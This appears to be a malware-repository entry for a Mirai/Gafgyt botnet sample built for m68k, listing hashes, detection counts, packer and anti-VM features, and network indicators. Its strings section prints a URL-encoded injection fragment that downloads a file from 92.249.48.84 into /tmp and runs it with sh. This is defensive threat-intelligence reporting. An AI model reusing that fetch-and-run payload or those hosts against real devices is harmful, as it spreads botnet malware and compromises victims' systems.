db0fa4b8db0333367e9bda3ab68b8042.m68k

First submission 2024-10-14 20:14:02

File details

File type: ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
Mime type: application/x-executable
File size: 81.31 KB (83264 bytes)
MD5: 16d3e4f80e72305abb84989dc8c8af30
SHA1: 1ada075adc17a1a019412a23cc03f764a9d52d9e
SHA256: 910e5a1d3d261f8062f3ef4f94cd8cdba4f37974750c0906b73d36da91c3f554

File features detected

Is DLL
Packers
Anti Debug
Anti VM
Signed
XOR

OSINT Enrichments

Virus Total: 41/77 VT report date: 2024-10-13 15:35:22
Malware Type 1 trojan
Threat Type 3 mirai gafgyt smmr1

URLs, FQDN and IP indicators 1

URL Host (FQDN/IP) Date Added
hXXp://83.233.102.197/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.m68k VirusTotal Report 83.233.102.197 VirusTotal Report 2024-10-14 20:14:02

Strings analysis - Possible IPs found 2

92.249.48.84
127.0.0.1

Strings analysis - Possible URLs found 3

http://schemas.xmlsoap.org/soap/encoding/
http://schemas.xmlsoap.org/soap/envelope/
http://92.249.48.84/bin+-O+/tmp/gaf;sh+/tmp/gaf